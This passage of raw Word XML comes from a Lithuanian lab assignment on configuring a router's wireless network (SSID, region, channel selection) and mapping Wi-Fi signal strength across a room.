      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onfigūruo</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> maršrutizatorių ir pateikite naudojamoje aplinkoje esančio </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WiFi (802.11 standartas) ryšio stiprumo planą (</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pateikite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>du</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">galimus </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scenarij</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – du žemėlap</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ius</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">du </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>plan</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6B036B" w14:textId="6056CBE4" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="003B60A5" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onfigūruokite maršrutizatori</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bevielį tinklą:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106EF7EA" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SSID – T1; T2; T3; T4; ar [pasirinktas_vardas]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C298FE5" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Regionas – Lithuania</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31820D66" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kanalo (angl. Chanel) nustatymas. Scenarijai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548C749" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="00B159D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="284" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AUTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3412356E" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="00B159D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="284" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kanalas, kuris yra LAISVIAUSIAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399884BE" w14:textId="4D5B15EE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Įjun</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wireless Router Radio</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SSID Broadcast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14915F79" w14:textId="77777777" w:rsidR="00621B4B" w:rsidRPr="005A5C28" w:rsidRDefault="00621B4B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B294750" w14:textId="14041846" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sudarykite patalpos(-ų) detalųjį planą</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kuri</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ame</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>žymėsite ryšio stiprumo žemėlapį. Sudarykite 802.11 standarto ryšio stiprumo žemėlapį</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">jo </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">planą (pagal galimybes </w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pažymėkite</w:t>
      </w:r>
      <w:r w:rsidR="00955CF5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00955CF5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nurodykite ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>turimą įrangą):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A19D2E" w14:textId="7C23FD48" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Naudo</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>damiesi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stacionariu kompiuteriu ir/arba</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pasirinkta</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>programa (išmaniame telefone)</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>matuo</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ryšio stiprumą</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>udarykite signalo stiprumo ir</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> jį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atitinka</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nčios</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>spalvos</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lentelę, kuria remsitės sudarydami signalo stiprumo žemėlapį</w:t>
      </w:r>
      <w:r w:rsidR="00955CF5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> planą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7817D4BC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ADAC161" wp14:editId="37E8E3E6">
            <wp:extent cx="2077720" cy="1579161"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="2159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788" r="1181"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2154162" cy="163726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45492722" w14:textId="4370561B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00A433BD" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD2C7E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Signalo stiprumo gradacijos pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F207D" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: Zykas A. (2020)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3E2CC9" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1848D88A" w14:textId="7B5E0504" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pasinaudodami nešiojamu kompiuteriu ir turima programine įranga fiksuokite 802.11 standarto signalo stiprumą ir</w:t>
      </w:r>
      <w:r w:rsidR="00955CF5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00955CF5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">arba teritorijos žemėlapį savo plane </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
